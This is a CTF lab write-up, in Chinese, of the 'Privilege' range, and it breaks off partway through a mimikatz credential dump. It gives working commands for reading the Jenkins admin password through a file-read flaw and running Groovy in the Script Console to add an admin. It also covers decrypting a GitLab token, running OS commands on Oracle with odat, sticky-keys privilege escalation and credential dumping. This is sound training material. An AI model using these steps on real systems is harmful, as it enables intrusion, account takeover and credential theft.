春秋云镜-Privilege

渗透

春秋云镜-Privilege

flag01

请获取 XR Shop 官网源码的备份文件，并尝试获得系统上任意文件读取的能力。并且，管理员在配置 Jenkins 时，仍然选择了使用初始管理员密码，请尝试读取该密码并获取 Jenkins 服务器权限。Jenkins 配置目录为 C:\ProgramData\Jenkins.jenkins。

fscan扫一下

fscan -h 39.99.141.48

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.3
start infoscan
39.99.141.48:139 open
39.99.141.48:8080 open
39.99.141.48:3306 open
39.99.141.48:80 open
39.99.141.48:135 open
[*] alive ports len is: 5
start vulscan
[*] NetInfo
[*]39.99.141.48
   [->]XR-JENKINS
   [->]172.22.14.7
[*] WebTitle http://39.99.141.48:8080  code:403 len:548    title:None
[*] WebTitle http://39.99.141.48       code:200 len:54646  title:XR SHOP
[+] PocScan http://39.99.141.48/www.zip poc-yaml-backup-file

发现有两个web服务，还有一个存在源代码泄露，我们把代码下下来看看。发现tool目录存在phpinfo和文件读取的两个文件

提示说了配置文件位置，利用这个读取文件C:\ProgramData\Jenkins.jenkins，了解一下之后知道具体文件位置为secrets/initialAdminPassword

拼接到一起后读到密码:510235cf43f14e83b88a9f144199655b

http://39.99.141.48/tools/content-log.php?logfile=C:\ProgramData\Jenkins\.jenkins\secrets/initialAdminPassword

使用admin/510235cf43f14e83b88a9f144199655b登录Jenkins

然后在访问manage目录，找到Script Console执行命令。

发现是system权限，那直接加个管理员用户进去

1 2	println "net user fffffilm Password@973 /add".execute().text println "net localgroup administrators fffffilm /add".execute().text

rdp上去读flag

flag01: flag{aecb6321-e65a-4f78-b879-7b6240b4eebe}

flag02

管理员为 Jenkins 配置了 Gitlab，请尝试获取 Gitlab API Token，并最终获取 Gitlab 中的敏感仓库。获取敏感信息后，尝试连接至 Oracle 数据库，并获取 ORACLE 服务器控制权限。

先不管别的，扫一下内网再说

fscan -h 172.22.14.7/24

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.3
start infoscan
(icmp) Target 172.22.14.7     is alive
(icmp) Target 172.22.14.11    is alive
(icmp) Target 172.22.14.16    is alive
(icmp) Target 172.22.14.31    is alive
(icmp) Target 172.22.14.46    is alive
[*] Icmp alive hosts len is: 5
172.22.14.46:445 open
172.22.14.31:445 open
172.22.14.11:445 open
172.22.14.7:445 open
172.22.14.46:139 open
172.22.14.31:139 open
172.22.14.11:139 open
172.22.14.7:139 open
172.22.14.46:135 open
172.22.14.31:135 open
172.22.14.11:135 open
172.22.14.7:135 open
172.22.14.46:80 open
172.22.14.16:80 open
172.22.14.7:80 open
172.22.14.16:22 open
172.22.14.11:88 open
172.22.14.7:8080 open
172.22.14.7:3306 open
172.22.14.31:1521 open
172.22.14.16:8060 open
172.22.14.16:9094 open
[*] alive ports len is: 22
start vulscan
[*] NetInfo
[*]172.22.14.7
   [->]XR-JENKINS
   [->]172.22.14.7
[*] NetInfo
[*]172.22.14.31
   [->]XR-ORACLE
   [->]172.22.14.31
[*] NetInfo
[*]172.22.14.46
   [->]XR-0923
   [->]172.22.14.46
[*] NetInfo
[*]172.22.14.11
   [->]XR-DC
   [->]172.22.14.11
[*] NetBios 172.22.14.31    WORKGROUP\XR-ORACLE
[*] NetBios 172.22.14.11    [+] DC:XIAORANG\XR-DC
[*] NetBios 172.22.14.46    XIAORANG\XR-0923
[*] WebTitle http://172.22.14.7:8080   code:403 len:548    title:None
[*] WebTitle http://172.22.14.16:8060  code:404 len:555    title:404 Not Found
[*] WebTitle http://172.22.14.16       code:502 len:3039   title:GitLab is not responding (502)
[*] WebTitle http://172.22.14.7        code:200 len:54603  title:XR SHOP
[*] WebTitle http://172.22.14.46       code:200 len:703    title:IIS Windows Server
[+] PocScan http://172.22.14.7/www.zip poc-yaml-backup-file

简单总结一下

172.22.14.7 外网(已拿下)

172.22.14.11 XR-DC

172.22.14.16 GitLab

172.22.14.31 WORKGROUP\XR-ORACLE

172.22.14.46 XIAORANG\XR-0923

发现172.22.14.16里面有个gitlab网站，再结合题目的描述，感觉就是先把gitlab拉下来，里面有XR-ORACLE的数据库密码，然后通过数据库提升权限拿flag。

读C:\ProgramData\Jenkins.jenkins\credentials.xml成功读到API Token：{AQAAABAAAAAg9+7GBocqYmo0y3H+uDK9iPsvst95F5i3QO3zafrm2TC5U24QCq0zm/GEobmrmLYh}

返回script解码token

1	println(hudson.util.Secret.decrypt("{AQAAABAAAAAg9+7GBocqYmo0y3H+uDK9iPsvst95F5i3QO3zafrm2TC5U24QCq0zm/GEobmrmLYh}"))

得到：glpat-7kD_qLH2PiQv_ywB9hz2

看看怎么用的项目 API | 极狐GitLab

先看所有公开项目（我第一次打这个报GitLab is not responding，试了好久没找到原因，重置之后才好

1	proxychains curl --header "PRIVATE-TOKEN:glpat-7kD_qLH2PiQv_ywB9hz2" "http://172.22.14.16/api/v4/projects" \|jq \|grep "http_url_to_repo"

再全部拉下来

proxychains git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/internal-secret.git 
proxychains git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/xradmin.git 
proxychains git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/awenode.git 
proxychains git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/xrwiki.git 
proxychains git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/gitlab-instance-23352f48/Monitoring.git

在xradmin中的ruoyi-admin/src/main/resources/application-druid.yml找到oracle账号密码

1
2
3

url: jdbc:oracle:thin:@172.22.14.31:1521/orcl
username: xradmin
password: fcMyE8t9E4XdsKf

直接用odat梭了

1
2

proxychains odat dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf --sysdba --exec 'net user fffffilm Password@973 /add'
proxychains odat dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf --sysdba --exec 'net localgroup administrators fffffilm /add'

rdp上去拿flag

flag02: flag{f0777778-80a1-494e-869a-455ebe3aa846}

flag03

攻击办公区内网，获取办公 PC 控制权限，并通过特权滥用提升至 SYSTEM 权限。

internal-secret\credentials.txt里面找了域内PC的账号密码

1	XR-0923 \| zhangshuai \| wSbEajHzZs

rdp上去发现权限很低。

1	whoami /all

因为题目说了特权滥用，我们肯定要关注一下特权吧

1	net user zhangshuai

查看管理组发现是*Remote Desktop Users *Remotee Managementt Use

使用 WinRM 连接主机，会直接获取到高完整性级别并且启用所有已拥有的特权：

1	proxychains4 evil-winrm -i 172.22.14.46 -u zhangshuai -p wSbEajHzZs

奇安信攻防社区-手把手教你Windows提权

现在多了一个SeRestorePrivilege，SeRestorePrivilege授予对系统上所有对象的写访问权，而不管它们的ACL如何。

所以我们直接改注册表，利用粘滞键提权

1 2	PS C:\Users\zhangshuai\Documents> ren C://windows/system32/sethc.exe C://windows/system32/sethc.bak PS C:\Users\zhangshuai\Documents> ren C://windows/system32/cmd.exe C://windows/system32/sethc.exe

将用户锁定然后按5下shift触发粘滞键即可得到system权限，拿到flag3

flag03: flag{4b6d3fa1-380d-4dc0-b20e-9f4c2fb225c3}

flag04

尝试接管备份管理操作员帐户，并通过转储 NTDS 获得域管理员权限，最终控制整个域环境。

加一个管理员账号

1 2	net user fffffilm Password@973 /add net localgroup administrators fffffilm /add

上传猕猴桃抓哈希

1 2	privilege::debug sekurlsa::logonpasswords

得到

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 3354993 (00000000:00333171)
Session           : RemoteInteractive from 3
User Name         : fffffilm
Domain            : XR-0923
Logon Server      : XR-0923
Logon Time        : 2025/3/3 14:11:30
SID               : S-1-5-21-754105099-1176710061-2177073800-1002
        msv :
         [00000003] Primary
         * Username : fffffilm
         * Domain   : XR-0923
         * NTLM     : ad123012e39b20a80ebe424bff56e1b4
         * SHA1     : 86bc9e9af57b6884802421251699bf41a1fc152a
        tspkg :
        wdigest :
         * Username : fffffilm
         * Domain   : XR-0923
         * Password : (null)
        kerberos :
         * Username : fffffilm
         * Domain   : XR-0923
         * Password : (null)
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 3339616 (00000000:0032f560)
Session           : Interactive from 3
User Name         : DWM-3
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/3/3 14:11:29
SID               : S-1-5-90-0-3
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : dce5964aedcfef01a9bfab09f4389340
         * SHA1     : 7a3f420e853e8164aaca11636958b900f4a23b8b
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-0923$
         * Domain   : xiaorang.lab
         * Password : 2f 3c c5 09 4d a2 90 4d 66 ab b8 38 26 61 67 89 68 e0 74 25 fb ea 57 6a c5 ea 10 99 b9 73 30 04 15 03 75 61 80 78 5b 88 c0 1a 44 04 d4 cb 7e b7 22 75 19 e5 1d e6 be 73 4d c7 bc 2b f4 e5 2f ef 33 71 99 f8 0f c3 3c 52 a7 57 cb 7b f8 11 73 bc 88 dc ae da 76 fe 2e 95 be 1f a2 cc 24 8f dd e0 f6 42 55 62 ac d9 3d 5b cc 48 69 29 fe 0e 8b c8 06 68 5b b2 29 38 7e 5c f9 4e 2d 4d 28 63 ce d7 0b a8 9c d4 eb 95 ba 8b c3 45 fc 89 02 2f e6 9f 92 b0 ec e7 9d b0 77 f4 96 31 28 86 34 ff 4b f6 92 a7 5f 4f 3b 24 4c a9 4b 37 fe df f4 4d f0 d0 d2 94 83 7b 99 9f f9 dd 91 9d df 93 84 79 7d b7 46 6b 5d 3f 91 b4 53 e9 e1 d7 b8 d3 95 40 dc 9e 5b a3 57 cd f6 34 ac 29 04 5e 23 e2 5b ca 3b e5 ad 8a fa e7 c2 8c ee 54 0f cd 7d fc c0 a8 7d a2
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 3338409 (00000000:0032f0a9)
Session           : Interactive from 3
User Name         : UMFD-3
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 2025/3/3 14:11:29
SID               : S-1-5-96-0-3
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : dce5964aedcfef01a9bfab09f4389340
         * SHA1     : 7a3f420e853e8164aaca11636958b900f4a23b8b
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-0923$
         * Domain   : xiaorang.lab
         * Password : 2f 3c c5 09 4d a2 90 4d 66 ab b8 38 26 61 67 89 68 e0 74 25 fb ea 57 6a c5 ea 10 99 b9 73 30 04 15 03 75 61 80 78 5b 88 c0 1a 44 04 d4 cb 7e b7 22 75 19 e5 1d e6 be 73 4d c7 bc 2b f4 e5 2f ef 33 71 99 f8 0f c3 3c 52 a7 57 cb 7b f8 11 73 bc 88 dc ae da 76 fe 2e 95 be 1f a2 cc 24 8f dd e0 f6 42 55 62 ac d9 3d 5b cc 48 69 29 fe 0e 8b c8 06 68 5b b2 29 38 7e 5c f9 4e 2d 4d 28 63 ce d7 0b a8 9c d4 eb 95 ba 8b c3 45 fc 89 02 2f e6 9f 92 b0 ec e7 9d b0 77 f4 96 31 28 86 34 ff 4b f6 92 a7 5f 4f 3b 24 4c a9 4b 37 fe df f4 4d f0 d0 d2 94 83 7b 99 9f f9 dd 91 9d df 93 84 79 7d b7 46 6b 5d 3f 91 b4 53 e9 e1 d7 b8 d3 95 40 dc 9e 5b a3 57 cd f6 34 ac 29 04 5e 23 e2 5b ca 3b e5 ad 8a fa e7 c2 8c ee 54 0f cd 7d fc c0 a8 7d a2
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 2106162 (00000000:00202332)
Session           : RemoteInteractive from 2
User Name         : zhangshuai
Domain            : XR-0923
Logon Server      : XR-0923
Logon Time        : 2025/3/3 14:05:17
SID               : S-1-5-21-754105099-1176710061-2177073800-1001
        msv :
         [00000003] Primary
         * Username : zhangshuai
         * Domain   : XR-0923
         * NTLM     : f97d5a4b44b11bc257a63c3f76f18a9a
         * SHA1     : f6ff2714d556240436758527e190e329f05cd43d
        tspkg :
        wdigest :
         * Username : zhangshuai
         * Domain   : XR-0923
         * Password : (null)
        kerberos :
         * Username : zhangshuai
         * Domain   : XR-0923
         * Password : (null)
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 2065367 (00000000:001f83d7)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/3/3 14:05:16
SID               : S-1-5-90-0-2
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : dce5964aedcfef01a9bfab09f4389340
         * SHA1     : 7a3f420e853e8164aaca11636958b900f4a23b8b
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-0923$
         * Domain   : xiaorang.lab
         * Password : 2f 3c c5 09 4d a2 90 4d 66 ab b8 38 26 61 67 89 68 e0 74 25 fb ea 57 6a c5 ea 10 99 b9 73 30 04 15 03 75 61 80 78 5b 88 c0 1a 44 04 d4 cb 7e b7 22 75 19 e5 1d e6 be 73 4d c7 bc 2b f4 e5 2f ef 33 71 99 f8 0f c3 3c 52 a7 57 cb 7b f8 11 73 bc 88 dc ae da 76 fe 2e 95 be 1f a2 cc 24 8f dd e0 f6 42 55 62 ac d9 3d 5b cc 48 69 29 fe 0e 8b c8 06 68 5b b2 29 38 7e 5c f9 4e 2d 4d 28 63 ce d7 0b a8 9c d4 eb 95 ba 8b c3 45 fc 89 02 2f e6 9f 92 b0 ec e7 9d b0 77 f4 96 31 28 86 34 ff 4b f6 92 a7 5f 4f 3b 24 4c a9 4b 37 fe df f4 4d f0 d0 d2 94 83 7b 99 9f f9 dd 91 9d df 93 84 79 7d b7 46 6b 5d 3f 91 b4 53 e9 e1 d7 b8 d3 95 40 dc 9e 5b a3 57 cd f6 34 ac 29 04 5e 23 e2 5b ca 3b e5 ad 8a fa e7 c2 8c ee 54 0f cd 7d fc c0 a8 7d a2
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 2064054 (00000000:001f7eb6)
Session           : Interactive from 2
User Name         : UMFD-2
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 2025/3/3 14:05:16
SID               : S-1-5-96-0-2
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : dce5964aedcfef01a9bfab09f4389340
         * SHA1     : 7a3f420e853e8164aaca11636958b900f4a23b8b
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-0923$
         * Domain   : xiaorang.lab
         * Password : 2f 3c c5 09 4d a2 90 4d 66 ab b8 38 26 61 67 89 68 e0 74 25 fb ea 57 6a c5 ea 10 99 b9 73 30 04 15 03 75 61 80 78 5b 88 c0 1a 44 04 d4 cb 7e b7 22 75 19 e5 1d e6 be 73 4d c7 bc 2b f4 e5 2f ef 33 71 99 f8 0f c3 3c 52 a7 57 cb 7b f8 11 73 bc 88 dc ae da 76 fe 2e 95 be 1f a2 cc 24 8f dd e0 f6 42 55 62 ac d9 3d 5b cc 48 69 29 fe 0e 8b c8 06 68 5b b2 29 38 7e 5c f9 4e 2d 4d 28 63 ce d7 0b a8 9c d4 eb 95 ba 8b c3 45 fc 89 02 2f e6 9f 92 b0 ec e7 9d b0 77 f4 96 31 28 86 34 ff 4b f6 92 a7 5f 4f 3b 24 4c a9 4b 37 fe df f4 4d f0 d0 d2 94 83 7b 99 9f f9 dd 91 9d df 93 84 79 7d b7 46 6b 5d 3f 91 b4 53 e9 e1 d7 b8 d3 95 40 dc 9e 5b a3 57 cd f6 34 ac 29 04 5e 23 e2 5b ca 3b e5 ad 8a fa e7 c2 8c ee 54 0f cd 7d fc c0 a8 7d a2
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 64350 (00000000:0000fb5e)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/3/3 13:48:40
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : 8519c5a89b2cd4d679a5a36f26863e5d
         * SHA1     : 42d8188bc30ff0880b838e368c6e5522b86f978d
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-0923$
         * Domain   : xiaorang.lab
         * Password : &H!vqg]om0Iz5Pn1NUGod&R9o /!$EK.?jn06+[J*6oZ\A+H?c2;V\(AgGpKw*f0W\vdUf;QoJ/5#DRZDwR@W5U9Io8`;zE7L":Ay-SKpe#>5S?;IL'HarDD
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 64332 (00000000:0000fb4c)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/3/3 13:48:40
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : dce5964aedcfef01a9bfab09f4389340
         * SHA1     : 7a3f420e853e8164aaca11636958b900f4a23b8b
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-0923$
         * Domain   : xiaorang.lab
         * Password : 2f 3c c5 09 4d a2 90 4d 66 ab b8 38 26 61 67 89 68 e0 74 25 fb ea 57 6a c5 ea 10 99 b9 73 30 04 15 03 75 61 80 78 5b 88 c0 1a 44 04 d4 cb 7e b7 22 75 19 e5 1d e6 be 73 4d c7 bc 2b f4 e5 2f ef 33 71 99 f8 0f c3 3c 52 a7 57 cb 7b f8 11 73 bc 88 dc ae da 76 fe 2e 95 be 1f a2 cc 24 8f dd e0 f6 42 55 62 ac d9 3d 5b cc 48 69 29 fe 0e 8b c8 06 68 5b b2 29 38 7e 5c f9 4e 2d 4d 28 63 ce d7 0b a8 9c d4 eb 95 ba 8b c3 45 fc 89 02 2f e6 9f 92 b0 ec e7 9d b0 77 f4 96 31 28 86 34 ff 4b f6 92 a7 5f 4f 3b 24 4c a9 4b 37 fe df f4 4d f0 d0 d2 94 83 7b 99 9f f9 dd 91 9d df 93 84 79 7d b7 46 6b 5d 3f 91 b4 53 e9 e1 d7 b8 d3 95 40 dc 9e 5b a3 57 cd f6 34 ac 29 04 5e 23 e2 5b ca 3b e5 ad 8a fa e7 c2 8c ee 54 0f cd 7d fc c0 a8 7d a2
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : XR-0923$
Domain            : XIAORANG
Logon Server      : (null)
Logon Time        : 2025/3/3 13:48:39
SID               : S-1-5-20
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : dce5964aedcfef01a9bfab09f4389340
         * SHA1     : 7a3f420e853e8164aaca11636958b900f4a23b8b
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : xr-0923$
         * Domain   : XIAORANG.LAB
         * Password : 2f 3c c5 09 4d a2 90 4d 66 ab b8 38 26 61 67 89 68 e0 74 25 fb ea 57 6a c5 ea 10 99 b9 73 30 04 15 03 75 61 80 78 5b 88 c0 1a 44 04 d4 cb 7e b7 22 75 19 e5 1d e6 be 73 4d c7 bc 2b f4 e5 2f ef 33 71 99 f8 0f c3 3c 52 a7 57 cb 7b f8 11 73 bc 88 dc ae da 76 fe 2e 95 be 1f a2 cc 24 8f dd e0 f6 42 55 62 ac d9 3d 5b cc 48 69 29 fe 0e 8b c8 06 68 5b b2 29 38 7e 5c f9 4e 2d 4d 28 63 ce d7 0b a8 9c d4 eb 95 ba 8b c3 45 fc 89 02 2f e6 9f 92 b0 ec e7 9d b0 77 f4 96 31 28 86 34 ff 4b f6 92 a7 5f 4f 3b 24 4c a9 4b 37 fe df f4 4d f0 d0 d2 94 83 7b 99 9f f9 dd 91 9d df 93 84 79 7d b7 46 6b 5d 3f 91 b4 53 e9 e1 d7 b8 d3 95 40 dc 9e 5b a3 57 cd f6 34 ac 29 04 5e 23 e2 5b ca 3b e5 ad 8a fa e7 c2 8c ee 54 0f cd 7d fc c0 a8 7d a2
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 33620 (00000000:00008354)
Session           : Interactive from 0
User Name         : UMFD-0
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 2025/3/3 13:48:39
SID               : S-1-5-96-0-0
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : dce5964aedcfef01a9bfab09f4389340
         * SHA1     : 7a3f420e853e8164aaca11636958b900f4a23b8b
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-0923$
         * Domain   : xiaorang.lab
         * Password : 2f 3c c5 09 4d a2 90 4d 66 ab b8 38 26 61 67 89 68 e0 74 25 fb ea 57 6a c5 ea 10 99 b9 73 30 04 15 03 75 61 80 78 5b 88 c0 1a 44 04 d4 cb 7e b7 22 75 19 e5 1d e6 be 73 4d c7 bc 2b f4 e5 2f ef 33 71 99 f8 0f c3 3c 52 a7 57 cb 7b f8 11 73 bc 88 dc ae da 76 fe 2e 95 be 1f a2 cc 24 8f dd e0 f6 42 55 62 ac d9 3d 5b cc 48 69 29 fe 0e 8b c8 06 68 5b b2 29 38 7e 5c f9 4e 2d 4d 28 63 ce d7 0b a8 9c d4 eb 95 ba 8b c3 45 fc 89 02 2f e6 9f 92 b0 ec e7 9d b0 77 f4 96 31 28 86 34 ff 4b f6 92 a7 5f 4f 3b 24 4c a9 4b 37 fe df f4 4d f0 d0 d2 94 83 7b 99 9f f9 dd 91 9d df 93 84 79 7d b7 46 6b 5d 3f 91 b4 53 e9 e1 d7 b8 d3 95 40 dc 9e 5b a3 57 cd f6 34 ac 29 04 5e 23 e2 5b ca 3b e5 ad 8a fa e7 c2 8c ee 54 0f cd 7d fc c0 a8 7d a2
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 33560 (00000000:00008318)
Session           : Interactive from 1
User Name         : UMFD-1
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 2025/3/3 13:48:39
SID               : S-1-5-96-0-1
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : dce5964aedcfef01a9bfab09f4389340
         * SHA1     : 7a3f420e853e8164aaca11636958b900f4a23b8b
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-0923$
         * Domain   : xiaorang.lab
         * Password : 2f 3c c5 09 4d a2 90 4d 66 ab b8 38 26 61 67 89 68 e0 74 25 fb ea 57 6a c5 ea 10 99 b9 73 30 04 15 03 75 61 80 78 5b 88 c0 1a 44 04 d4 cb 7e b7 22 75 19 e5 1d e6 be 73 4d c7 bc 2b f4 e5 2f ef 33 71 99 f8 0f c3 3c 52 a7 57 cb 7b f8 11 73 bc 88 dc ae da 76 fe 2e 95 be 1f a2 cc 24 8f dd e0 f6 42 55 62 ac d9 3d 5b cc 48 69 29 fe 0e 8b c8 06 68 5b b2 29 38 7e 5c f9 4e 2d 4d 28 63 ce d7 0b a8 9c d4 eb 95 ba 8b c3 45 fc 89 02 2f e6 9f 92 b0 ec e7 9d b0 77 f4 96 31 28 86 34 ff 4b f6 92 a7 5f 4f 3b 24 4c a9 4b 37 fe df f4 4d f0 d0 d2 94 83 7b 99 9f f9 dd 91 9d df 93 84 79 7d b7 46 6b 5d 3f 91 b4 53 e9 e1 d7 b8 d3 95 40 dc 9e 5b a3 57 cd f6 34 ac 29 04 5e 23 e2 5b ca 3b e5 ad 8a fa e7 c2 8c ee 54 0f cd 7d fc c0 a8 7d a2
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 32439 (00000000:00007eb7)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2025/3/3 13:48:39
SID               :
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : dce5964aedcfef01a9bfab09f4389340
         * SHA1     : 7a3f420e853e8164aaca11636958b900f4a23b8b
        tspkg :
        wdigest :
        kerberos :
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 3355022 (00000000:0033318e)
Session           : RemoteInteractive from 3
User Name         : fffffilm
Domain            : XR-0923
Logon Server      : XR-0923
Logon Time        : 2025/3/3 14:11:30
SID               : S-1-5-21-754105099-1176710061-2177073800-1002
        msv :
         [00000003] Primary
         * Username : fffffilm
         * Domain   : XR-0923
         * NTLM     : ad123012e39b20a80ebe424bff56e1b4
         * SHA1     : 86bc9e9af57b6884802421251699bf41a1fc152a
        tspkg :
        wdigest :
         * Username : fffffilm
         * Domain   : XR-0923
         * Password : (null)
        kerberos :
         * Username : fffffilm
         * Domain   : XR-0923
         * Password : (null)
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 3340105 (00000000:0032f749)
Session           : Interactive from 3
User Name         : DWM-3
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/3/3 14:11:29
SID               : S-1-5-90-0-3
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : dce5964aedcfef01a9bfab09f4389340
         * SHA1     : 7a3f420e853e8164aaca11636958b900f4a23b8b
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-0923$
         * Domain   : xiaorang.lab
         * Password : 2f 3c c5 09 4d a2 90 4d 66 ab b8 38 26 61 67 89 68 e0 74 25 fb ea 57 6a c5 ea 10 99 b9 73 30 04 15 03 75 61 80 78 5b 88 c0 1a 44 04 d4 cb 7e b7 22 75 19 e5 1d e6 be 73 4d c7 bc 2b f4 e5 2f ef 33 71 99 f8 0f c3 3c 52 a7 57 cb 7b f8 11 73 bc 88 dc ae da 76 fe 2e 95 be 1f a2 cc 24 8f dd e0 f6 42 55 62 ac d9 3d 5b cc 48 69 29 fe 0e 8b c8 06 68 5b b2 29 38 7e 5c f9 4e 2d 4d 28 63 ce d7 0b a8 9c d4 eb 95 ba 8b c3 45 fc 89 02 2f e6 9f 92 b0 ec e7 9d b0 77 f4 96 31 28 86 34 ff 4b f6 92 a7 5f 4f 3b 24 4c a9 4b 37 fe df f4 4d f0 d0 d2 94 83 7b 99 9f f9 dd 91 9d df 93 84 79 7d b7 46 6b 5d 3f 91 b4 53 e9 e1 d7 b8 d3 95 40 dc 9e 5b a3 57 cd f6 34 ac 29 04 5e 23 e2 5b ca 3b e5 ad 8a fa e7 c2 8c ee 54 0f cd 7d fc c0 a8 7d a2
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 2106191 (00000000:0020234f)
Session           : RemoteInteractive from 2
User Name         : zhangshuai
Domain            : XR-0923
Logon Server      : XR-0923
Logon Time        : 2025/3/3 14:05:17
SID               : S-1-5-21-754105099-1176710061-2177073800-1001
        msv :
         [00000003] Primary
         * Username : zhangshuai
         * Domain   : XR-0923
         * NTLM     : f97d5a4b44b11bc257a63c3f76f18a9a
         * SHA1     : f6ff2714d556240436758527e190e329f05cd43d
        tspkg :
        wdigest :
         * Username : zhangshuai
         * Domain   : XR-0923
         * Password : (null)
        kerberos :
         * Username : zhangshuai
         * Domain   : XR-0923
         * Password : (null)
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 2064760 (00000000:001f8178)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/3/3 14:05:16
SID               : S-1-5-90-0-2
        msv :
         [00000003] Primary
         * Username : XR-0923$
         * Domain   : XIAORANG
         * NTLM     : dce5964aedcfef01a9bfab09f4389340
         * SHA1     : 7a3f420e853e8164aaca11636958b900f4a23b8b
        tspkg :
        wdigest :
         * Username : XR-0923$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : XR-0923$
         * Domain   : xiaorang.lab
